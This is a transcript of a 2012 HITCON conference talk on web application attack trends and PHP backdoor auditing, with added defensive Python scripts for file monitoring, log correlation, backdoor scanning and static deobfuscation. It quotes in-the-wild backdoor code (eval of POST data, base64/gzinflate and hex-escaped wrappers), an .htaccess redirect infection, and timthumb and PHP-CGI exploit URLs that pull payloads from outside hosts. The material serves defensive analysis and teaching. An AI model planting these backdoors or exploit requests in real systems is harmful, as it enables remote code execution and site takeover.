The state of web application security - HITCON 2012 (slide transcript)
![Page 1: The state of web application security - HITCONhitcon.org/2012/download/0720B4_Robert.Lei.Rowley... · 1 . The state of web application security . 2012 . Robert Rowley . Security Architect](https://reader033.vdocuments.site/reader033/viewer/2022052721/5f0a45037e708231d42ad580/html5/thumbnails/1.jpg)
The state of web application security 2012
Robert Rowley
Security Architect
DreamHost
Break Down
Attack Trends
Attacker Motivation
Auditing Backdoors
Trends
Collecting data
Web Application Firewall (mod_security)
Running on 1,000,000+ websites
Centralized logging
Trend data sets
26 Million records.
Time frame: August 2011 – Present
Attacks!
Breaking it down
Specific attacks against software
● E107
– Remote code execution
– ?var=[php]exec();
– Released May 2010 (CVE-2010-2099)
● ZenCart
– SQL injection/execution
– Released May 2009 (CVE-2009-2254)
(chart: attack counts over time for E107 and ZenCart)
timthumb
● Allows arbitrary file upload
● Including fully functional php files
● Popular WordPress theme component
● (not part of WordPress core or plugins)
● Released August 2011 (CVE-2011-4106)
(chart: E107 and ZenCart attack counts, continued)
(chart: timthumb attack counts over time)
Life-cycle of an exploit
(chart: attack volume over time, annotated "puberty" and "maturity")
Theory about this trend...
● Attacks are automated.
– Lead time for attack code update.
● Successful compromise adds a new node.
– This creates fluctuations in growth.
PHP-CGI remote code execution
● Arbitrary code execution
● Source code disclosure
● Denial of service
● Released May 2012 (CVE-2012-1823)
● Our staff was notified
● We rolled out a virtual patch before the 0day was released.
(chart: E107, ZenCart and timthumb attack counts over time)
(chart: PHP-CGI attack counts over time, 0-day marked)
(chart: PHP-CGI attack counts over time, "puberty" phase marked)
Attack Response
Notify the ISP's abuse desk
90 ISPs notified each day
Most are non-responsive to the report.
Attack sources
Home/Business ISP (20%)
Hosting/Datacenter (80%)
A little about incident response
Response breakdown
● Immediate mitigation
– Put out the fire
– Monitor
– Review
● Long term fixes
– Correct business policy
– Secure code and/or configurations
– Etc...
Standard approach (diagram)
Monitoring → Vulnerability released, Incident → Assessment, Incident Response → Evaluation, Update
Better approach (diagram, same stages)
Monitoring → Vulnerability released, Incident → Assessment, Incident Response → Evaluation, Update
Auditing nitty gritty
File monitoring (you do this right?)
Logs (correlate timestamps)
Logs (sort by request!)
No logs? Malware detection by hand
FileSystem Monitoring
Part of your backups.
Just use rsync
inotify (kernel level)
Tripwire (daemon/service)
DIY
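A DIY version of the file-monitoring idea on this slide, added here as an example and not code from the talk: it records size, mtime and SHA-256 for every regular file under a web root, then diffs a later snapshot against that baseline. A backdoor dropped by a web request shows up as a new or modified file in the next diff, which is the signal the "File monitoring (you do this right?)" bullet is after. The directory layout, file names and the "dropped backdoor" in demo() are constructed for this example.

```python
"""Baseline a web root and report added, modified and deleted files (added example)."""
import hashlib
import json
import os
import tempfile


def snapshot(root):
    """Walk root and return {relative_path: (size, mtime, sha256)} for regular files."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and specials are not hashed
            st = os.stat(full)
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = (st.st_size, int(st.st_mtime), h.hexdigest())
    return manifest


def diff_manifests(baseline, current):
    """Return (added, modified, deleted) relative paths.

    A file counts as modified when its hash changes. mtime alone is not trusted:
    an attacker can reset it with touch -r to blend in with the original files."""
    added = sorted(p for p in current if p not in baseline)
    deleted = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in current if p in baseline and current[p][2] != baseline[p][2])
    return added, modified, deleted


def save_baseline(manifest, path):
    with open(path, "w") as fh:
        json.dump(manifest, fh)


def load_baseline(path):
    with open(path) as fh:
        return {k: tuple(v) for k, v in json.load(fh).items()}


def demo():
    """Constructed scenario: baseline a fake web root, then 'drop' a backdoor into it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "wp-content", "plugins"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    plugin = os.path.join(root, "wp-content", "plugins", "hello.php")
    with open(plugin, "w") as fh:
        fh.write("<?php // legitimate plugin\n")
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="fim-"), "baseline.json")
    save_baseline(snapshot(root), baseline_path)  # keep this off the web root in real use

    # Simulated compromise: a new backdoor file plus an injected line in a plugin.
    with open(os.path.join(root, "backdoor.php"), "w") as fh:
        fh.write("<?php eval($_POST['payload']); ?>\n")
    with open(plugin, "a") as fh:
        fh.write("eval(base64_decode('x'));\n")

    return diff_manifests(load_baseline(baseline_path), snapshot(root))


if __name__ == "__main__":
    added, modified, deleted = demo()
    print("added:   ", added)
    print("modified:", modified)
    print("deleted: ", deleted)
```

Store the baseline somewhere the web server's user cannot write, or the first thing a backdoor does is re-baseline itself.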
Digging in with timestamps.
$ ls -la omgfire.com/backdoor.php
-rw-rw-r-- 1 user grp 0 Feb 13 21:52 omgfire.com/backdoor.php
$ grep 21:52: logs/omgfire.com/access.log.2012-02-13
123.125.71.31 - - [13/Feb/2012:21:52:53 -0800] "POST /wp-content/plugins/hello.php HTTP/1.1" 200 158 "-" "Mozilla"
Digging in with HTTP logs
$ awk '{print $7}' access.log | sort | uniq -c | sort -n
1 /phpMyAdmin-2.2.3/index.php
1 /phpMyAdmin-2.5.5-pl1/index.php
1 /phpMyAdmin-2.5.5/index.php
1 /phpMyAdmin-2.5.6-rc2/index.php
1 /phpMyAdmin/index.php
1 /pma/index.php
1 /web/phpMyAdmin/index.php
1 /websql/index.php
2 /phpmyadmin/index.php
4 /robots.txt
242 /
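The two log tricks from the last three slides in one script, added here as an example rather than taken from the talk: the path count is the awk | sort | uniq -c | sort -n one-liner (rare paths float to the top, which is where scanner probes and the one request that dropped a file sit), and requests_near() is the timestamp correlation, listing every request within a window of the backdoor's mtime with POSTs first because they are the ones that write. The log lines, IP addresses and the mtime are constructed for this example.

```python
"""Path counts and mtime correlation over Apache combined-format access logs (added example)."""
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Apache "combined" format: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: a handful of normal hits, two phpMyAdmin probes, and the POST
# that lands on a plugin file a few seconds before a backdoor's mtime.
SAMPLE_LOG = """\
203.0.113.7 - - [13/Feb/2012:21:40:02 -0800] "GET / HTTP/1.1" 200 5120 "-" "Mozilla"
203.0.113.7 - - [13/Feb/2012:21:40:03 -0800] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla"
198.51.100.23 - - [13/Feb/2012:21:51:10 -0800] "GET /phpMyAdmin/index.php HTTP/1.1" 404 210 "-" "Mozilla"
198.51.100.23 - - [13/Feb/2012:21:51:11 -0800] "GET /pma/index.php HTTP/1.1" 404 210 "-" "Mozilla"
198.51.100.23 - - [13/Feb/2012:21:52:53 -0800] "POST /wp-content/plugins/hello.php HTTP/1.1" 200 158 "-" "Mozilla"
203.0.113.7 - - [13/Feb/2012:21:53:30 -0800] "GET / HTTP/1.1" 200 5120 "-" "Mozilla"
203.0.113.7 - - [13/Feb/2012:21:55:00 -0800] "GET / HTTP/1.1" 200 5120 "-" "Mozilla"
"""


def parse(lines):
    """Yield one dict per line that matches the combined format; skip the rest."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
        yield rec


def path_counts(lines):
    """awk '{print $7}' | sort | uniq -c | sort -n: (path, count) pairs, rarest first."""
    counts = Counter(r["path"] for r in parse(lines))
    return sorted(counts.items(), key=lambda kv: (kv[1], kv[0]))


def requests_near(lines, when, window_seconds=60):
    """Requests within +/- window of a file mtime, POSTs first, then by time."""
    lo = when - timedelta(seconds=window_seconds)
    hi = when + timedelta(seconds=window_seconds)
    hits = [r for r in parse(lines) if lo <= r["time"] <= hi]
    return sorted(hits, key=lambda r: (r["method"] != "POST", r["time"]))


def demo():
    lines = SAMPLE_LOG.splitlines()
    # ls -la shows minute resolution ("Feb 13 21:52"), so anchor on the whole
    # minute and look 90 seconds either side of it.
    mtime = datetime(2012, 2, 13, 21, 52, 0, tzinfo=timezone(timedelta(hours=-8)))
    return path_counts(lines), requests_near(lines, mtime, 90)


if __name__ == "__main__":
    counts, nearby = demo()
    for path, n in counts:
        print(f"{n:7d} {path}")
    print("--- requests near the backdoor mtime ---")
    for r in nearby:
        print(r["time"].isoformat(), r["ip"], r["method"], r["path"], r["status"])
```

For real logs use stat's full-resolution mtime and a narrower window; the minute granularity here only reflects what ls -la prints.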
No success?
Let's get into some backdoor auditing
These backdoors were found in the wild
Show you what to look for
Learn more about the attacker's methods
Using find to find
● Use "find" on any linux/unix server
find /www/path -type f -exec grep -l "$fingerprint" {} \;
● Use generic fingerprints of commands that execute code.
– eval, preg_replace, exec, assert, etc...
● Use fingerprints of known backdoors
Using find to cleanup
● find /www/path -exec grep "$fingerprint" {} \;
● find /www/path -exec grep "$fingerprint" {} \; -exec chmod 0 {} \;
● find /www/path -exec grep "$fingerprint" {} \; -exec sed -i "s/$fingerprint//" {} \;
● The second -exec runs only when grep exits 0, i.e. when the file matched; that exit status is the gate.
● chmod 0 is reversible and keeps the evidence. The sed edit is not: without -i it only prints to stdout, with -i it rewrites the file in place and leaves whatever surrounded the fingerprint (usually broken PHP), and $fingerprint is parsed by sed as a regex, so any / or metacharacter in it has to be escaped.
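The find/grep sweep from the last two slides as a script, added here as an example and not the talk's own tooling. It keeps the slide's gate (act only on a match) but scores each file against several generic fingerprints at once, including the wrapper shapes shown later in this deck, and applies the chmod 0 quarantine only above a threshold so a lone base64_decode in a caching plugin does not get locked out. The file tree in demo() is constructed in a temporary directory; the fingerprint weights and the threshold are this example's choices.

```python
"""Score PHP files against backdoor fingerprints and quarantine the worst (added example)."""
import os
import re
import tempfile

# "Commands that execute code" (slide 31) plus the wrappers shown later in the deck.
# Weighted: a lone eval() turns up in legitimate plugins; eval of a decoded blob,
# preg_replace /e or a variable-as-function chain almost never does.
FINGERPRINTS = [
    (re.compile(r"\beval\s*\("), 2, "eval("),
    (re.compile(r"\bassert\s*\("), 2, "assert("),
    (re.compile(r"\b(?:exec|shell_exec|system|passthru|popen)\s*\("), 2, "shell exec"),
    (re.compile(r"\bbase64_decode\s*\("), 1, "base64_decode("),
    (re.compile(r"\b(?:gzinflate|gzuncompress|str_rot13)\s*\("), 2, "gzinflate/str_rot13"),
    (re.compile(r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\("), 4, "eval of decoded blob"),
    (re.compile(r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"), 4, "preg_replace /e"),
    (re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\)"), 2, "request parameter passed straight to a call"),
    (re.compile(r"\$[A-Za-z_]\w*\s*\(\s*@?\s*\$[A-Za-z_]\w*\s*\("), 4, "variable-as-function chain"),
]


def scan_file(path):
    """Return (score, [labels]) for one file; score 0 means nothing matched."""
    try:
        with open(path, "rb") as fh:
            text = fh.read().decode("latin-1")  # 1:1 bytes to chars, never raises
    except OSError:
        return 0, []
    score, labels = 0, []
    for rx, weight, label in FINGERPRINTS:
        if rx.search(text):
            score += weight
            labels.append(label)
    return score, labels


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk root like find(1); return {relative_path: (score, labels)} for files that hit."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            score, labels = scan_file(full)
            if score:
                hits[os.path.relpath(full, root).replace(os.sep, "/")] = (score, labels)
    return hits


def quarantine(root, hits, threshold=4):
    """The slide's chmod 0 step, applied only at or above threshold; returns the paths."""
    done = []
    for rel, (score, _) in sorted(hits.items()):
        if score >= threshold:
            os.chmod(os.path.join(root, rel), 0)
            done.append(rel)
    return done


def demo():
    """Constructed tree: one clean file, one borderline, three backdoor shapes from the deck."""
    root = tempfile.mkdtemp(prefix="scan-")
    samples = {
        "index.php": "<?php echo 'ok'; ?>",
        "plugin/cache.php": "<?php $x = base64_decode($blob); ?>",
        "uploads/x.php": "<?php eval(base64_decode('JGF1dGhfcGFzcyA9IC')); ?>",
        "img/thumb.php": "<?php @$a(@$b('ZXZhbChnemluZm')); ?>",
        "theme/f.php": "<?php preg_replace(\"/.*/e\", \"\\x65\\x76\\x61\\x6C\", ''); ?>",
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    hits = scan_tree(root)
    return hits, quarantine(root, hits)


if __name__ == "__main__":
    hits, quarantined = demo()
    for rel, (score, labels) in sorted(hits.items(), key=lambda kv: -kv[1][0]):
        print(f"{score:3d} {rel}: {', '.join(labels)}")
    print("quarantined:", quarantined)
```

Note that thumb.php scores on shape alone: nothing in it spells eval, assert or base64_decode, which is the point the "Fingerprinting can be untrustworthy" slide makes at the end of the deck.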
Attacker Motivation
?
Attacker Motivation
$
Find an exploit? Do the right thing.
Bounty programs (facebook, google, paypal)
Responsible disclosure
Don't become a criminal
0-day to Pay-day
Install backdoors
Sell access to backdoors on the black market
Phishing
Spam
BlackHat SEO
Traffic Theft
Install more backdoors
Payday
Phishing
Identity/Password theft
http://site/some_dir/www.bankingsite.com/
Payday
Spam
Everyone knows this already
Payday
BlackHat SEO
Hidden links injected on site
Redirect visitors
Payday
Traffic Theft
Javascript/Iframe/other
Redirect site traffic to malicious pages (malware installs)
Flashback trojan
Payday
Install more backdoors on the site
Why not?
Backdoor on backdoor action
A little more on traffic theft.
Q1 2012 we noticed an influx of these
Actions were taken, data was recorded
Example .htaccess infection:
ErrorDocument 404 http://congatarcxisi.ru/
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|...
RewriteRule ^(.*)$ http://congatarcxisi.ru/ [R=301,L]
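A check for the .htaccess pattern on this slide, added here as an example and not part of the talk. The infection sends visitors who arrive from a search engine, and anyone who hits a 404, to a third-party host, while the owner, who types the URL directly, sees a normal site; so the audit pairs each RewriteCond on HTTP_REFERER with the RewriteRule that follows it and flags any rule or ErrorDocument whose target is an absolute URL on another host. The sample file, the site host and the redirect target are constructed for this example.

```python
"""Flag off-site ErrorDocument and referer-conditional redirects in .htaccess (added example)."""
import re
from urllib.parse import urlparse

SEARCH_ENGINES = re.compile(r"google|yahoo|bing|msn|aol|ask", re.I)

# Constructed: a stock WordPress block followed by the injected lines.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
# END WordPress
ErrorDocument 404 http://redirect.example.invalid/
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing).*$ [NC]
RewriteRule ^(.*)$ http://redirect.example.invalid/ [R=301,L]
"""


def external_host(target, site_host):
    """Host of target if it is an absolute URL pointing away from site_host, else None."""
    p = urlparse(target)
    if p.scheme in ("http", "https") and p.netloc and p.netloc.lower() != site_host.lower():
        return p.netloc.lower()
    return None


def audit_htaccess(text, site_host):
    """Return [(line_no, reason, line)] for directives that push traffic off-site."""
    findings = []
    referer_cond = False  # RewriteCond lines apply to the next RewriteRule only
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "errordocument" and len(parts) >= 3:
            host = external_host(parts[2], site_host)
            if host:
                findings.append((no, f"ErrorDocument {parts[1]} sends error pages off-site to {host}", line))
        elif directive == "rewritecond" and len(parts) >= 3:
            referer_cond = referer_cond or (
                "HTTP_REFERER" in parts[1].upper() and bool(SEARCH_ENGINES.search(parts[2]))
            )
        elif directive == "rewriterule" and len(parts) >= 3:
            host = external_host(parts[2], site_host)
            if host and referer_cond:
                findings.append((no, f"search-engine visitors redirected to {host}", line))
            elif host:
                findings.append((no, f"unconditional redirect to {host}", line))
            referer_cond = False
    return findings


if __name__ == "__main__":
    for no, reason, line in audit_htaccess(SAMPLE_HTACCESS, "www.example.com"):
        print(f"line {no}: {reason}\n    {line}")
```

Run it against every .htaccess under the web root, not just the top-level one; attackers drop copies into subdirectories where they survive a cleanup of the main file.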
Collection
Pulled the remote site from any .htaccess similar to the previous example.
1000 unique domains found
Let's break it down
SiteCheck report
Safe ( 2%)
Low Risk (29%)
Malicious (31%)
Unknown (38%)
TLD
.ru (64%)
.com (14%)
.info ( 8%)
.in ( 8%)
.org ( 3%)
.net ( 2%)
other ( 1%)
Registrars
Reg.ru (50%)
Directi (18%)
Other (18%)
GoDaddy (13%)
IP address
other (33%)
208.87.35.103 (22%)
94.63.149.246 (10%)
208.73.210.29 ( 9%)
69.43.161.154 ( 5%)
221.132.34.163 ( 5%)
95.211.131.185 ( 4%)
74.117.116.96 ( 4%)
94.63.149.247 ( 2%)
79.137.226.90 ( 2%)
69.165.98.21 ( 2%)
194.28.114.102 ( 2%)
Backdoor evolution
Plaintext
Base64 decode
preg_replace
and beyond!!!
Collection
● Compromised sites
● Attack logs
Getting backdoors from attack logs: timthumb.php
● Example malicious URL: …/timthumb.php?src=http://flickr.com.bpmohio.com/bad.php
– The host passes timthumb's allowlist check because it merely begins with flickr.com
● Download backdoor: curl http://flickr.com.bpmohio.com/bad.php
● Review/Categorize/Report
o--=[ r57 PHP Shell ]=--o
$version = "2009";
Getting backdoors from attack logs: PHP-CGI
● Example malicious URL: /?-d...auto_prepend_file=http://64.109.183.21/bin/acesso.txt
– The query string reaches php-cgi as command-line arguments, so -d sets php.ini directives such as auto_prepend_file
● Download backdoor: wget http://64.109.183.21/bin/acesso.txt
● Review/Categorize/Report
r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru
version = "1.666";
Dead Simple
<?php
eval($_POST['payload']);
?>
Some Authentication
if(md5($_COOKIE['be80d91eb9db4ffa'])
== "e8fa67e99b7e07e9e699f8c3d1dbb43d" )
{
eval($_POST['payload']);
exit;
}
Well Documented
#####cfg#####
# use password true / false #
$create_password = true;
$password = "mugus"; // default password
# UNIX COMMANDS
# description (nst) command
# example: Shutdown (nst) shutdown -h now
######ver####
$ver= "v2.1";
#############
$pass=$_POST['pass'];
if($pass==$password){ ...
Base64 decode
eval(base64_decode('JGF1dGhfcGFzcyA9IC...
My favorite way to handle them:
sed s/eval/print/g < inputfile > outputfile
print(base64_decode('JGF1dGhfcGFzcyA9IC...
PHP parser outputs:
$auth_pass = "35a93487bc9204c...
Caveat: only the eval calls become prints. Every other statement in the file still runs when PHP parses it, so do this on a throwaway sandbox, and check the printed output for a further eval(...) layer that needs the same treatment.
GZinflate
<?
error_reporting(0);
echo "ok!";
$code = "xZbNYaMwFFP3lfoO7JJHwnXa … “;
@eval(gzinflate(base64_decode($code)));
?>
Gold star for trying ...
eval(gzinflate(str_rot13(base64_decode('FJ3FjsNculJfpXT9WB6YVnfdltmJmW ...
Regex revenge
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67...
65 = e
76 = v
61 = a
6C = l
28 = (
The /e modifier makes preg_replace evaluate the replacement string as PHP code, and the hex escapes spell out eval(g... so that a grep for "eval" never sees it. (The /e modifier was deprecated in PHP 5.5 and removed in PHP 7.)
Variables as functions
$HixNlV='as';$eQovrf='e';$xsEWcg=$HixNlV.'s'.$eQovrf.'r'.'t';$HtJYXB='b'.$HixNlV.$eQovrf.(64).'_'.'d'.$eQovrf.'c'.'o'.'d'.$eQovrf;
@$xsEWcg(@$HtJYXB('ZXZhbChnemluZm...
Concatenated, $xsEWcg is "assert" and $HtJYXB is "base64_decode", so the second line is:
assert(base64_decode('ZXZhbChnemluZm...
assert() with a string argument evaluates it as code (PHP 5 and 7; removed in PHP 8), so this is eval by another name, called through variables so that neither word appears in the file.
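A static decoder for the wrapper layers shown in the Base64 decode, GZinflate, "Gold star", "Regex revenge" and "Variables as functions" slides, added here as an example and not code from the talk. Unlike the sed s/eval/print/ trick it never runs PHP: it pattern-matches the outermost eval() or assert() call, undoes the decoder chain inside it (base64_decode, gzinflate, gzuncompress, str_rot13) in the order PHP would apply them, expands \xNN string escapes, and repeats until no wrapper is left. The three-layer backdoor in build_sample() is generated from a known plaintext so the round trip can be checked; the only fragment taken from the slides is the visible base64 prefix 'ZXZhbChnemluZm', which decodes to eval(gzinf. Resolving concatenated variable names like $HixNlV.'s'... is out of scope here and still needs a human or a PHP sandbox.

```python
"""Peel eval/assert(decoder(...('blob'))) wrappers without executing PHP (added example)."""
import base64
import codecs
import re
import zlib

# Outermost wrapper: [@]eval|assert( call( call( ... '<blob>' ) ... ) );
WRAPPER_RE = re.compile(
    r"@?\b(?:eval|assert)\s*\(\s*(?P<chain>(?:@?\w+\s*\(\s*)+)"
    r"(?P<q>['\"])(?P<blob>[^'\"]*)(?P=q)\s*\)+\s*;?",
    re.S,
)
HEX_ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")


def _b64(b):
    return base64.b64decode(b + b"=" * (-len(b) % 4))  # tolerate stripped padding


def _rot13(b):
    # PHP str_rot13 rotates a-zA-Z only; latin-1 keeps every other byte intact
    return codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1")


DECODERS = {
    "base64_decode": _b64,
    "gzinflate": lambda b: zlib.decompress(b, -15),  # PHP gzinflate: raw DEFLATE, no header
    "gzuncompress": zlib.decompress,                  # PHP gzuncompress: zlib-wrapped DEFLATE
    "str_rot13": _rot13,
}


def decode_hex_escapes(src):
    """Turn "\\x65\\x76\\x61\\x6C" style literals back into readable text."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), src)


def unwrap_once(src):
    """Undo the outermost eval/assert wrapper. Returns (new_source, calls applied)."""
    m = WRAPPER_RE.search(src)
    if not m:
        return src, []
    calls = [c.lstrip("@") for c in re.findall(r"@?\w+", m.group("chain"))]
    data = m.group("blob").encode("latin-1")
    for call in reversed(calls):  # innermost call runs first in PHP, so decode in that order
        if call not in DECODERS:
            return src, []        # unknown wrapper: leave it for a human
        try:
            data = DECODERS[call](data)
        except (ValueError, zlib.error):
            return src, []
    return src[:m.start()] + data.decode("latin-1") + src[m.end():], calls


def deobfuscate(src, max_layers=10):
    """Peel wrappers until nothing matches; return (plain_source, layer descriptions)."""
    layers = []
    src = decode_hex_escapes(src)
    for _ in range(max_layers):
        new, calls = unwrap_once(src)
        if not calls:
            break
        layers.append("+".join(calls))
        src = decode_hex_escapes(new)
    return src, layers


def build_sample():
    """Constructed backdoor: eval(gzinflate(str_rot13(base64_decode('...')))) around a cookie-gated eval."""
    plain = "if(md5($_COOKIE['k'])==\"e8fa\"){eval($_POST['payload']);exit;}"
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    deflated = co.compress(plain.encode()) + co.flush()
    blob = base64.b64encode(_rot13(deflated)).decode()
    return "<?php @eval(gzinflate(str_rot13(base64_decode('" + blob + "')))); ?>"


if __name__ == "__main__":
    source, layers = deobfuscate(build_sample())
    print("layers:", layers)
    print(source)
    print(deobfuscate("assert(base64_decode('ZXZhbChnemluZm'));"))
```

The hex-escape pass runs over the whole file, so a \x27 inside a legitimate string becomes a quote; that is acceptable for triage output but do not write the result back over the original file.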
Uhm what...
Itty Bitty Bitwise Operators
$FR='sFwFLOzO'|~OU;
$cYqFBi=r7bSCQ&'J|Ok@V';
$z3X0fdta1Nz="c>_"&'Q7[';
$kg6i=#qfapJag'.']/=nX/'^'8'.KyK6.'{';
$iZBTF=lsrc.'<'.Smef&srzI.':'.VmqH;
PHP applies |, &, ^ and ~ to strings byte by byte, and an undefined bare word such as OU is treated as the string "OU" (with a notice, before PHP 8). That is how these lines build the strings they need, function names included, without any of them ever appearing literally in the file.
Backdoor Conclusions
Attackers are evolving their code
Fingerprinting can be untrustworthy
Monitor your filesystem
Thank you
Trustwave (mod_security)
DreamHost & DreamHost customers
White hat security researchers
OWASP
Security BSides
HITcon
Further Reading
Mikko Hypponen (TED talks)
http://blog.spiderlabs.com
http://blog.dreamhost.com/category/security
Want to follow up?
Twitter: @iamlei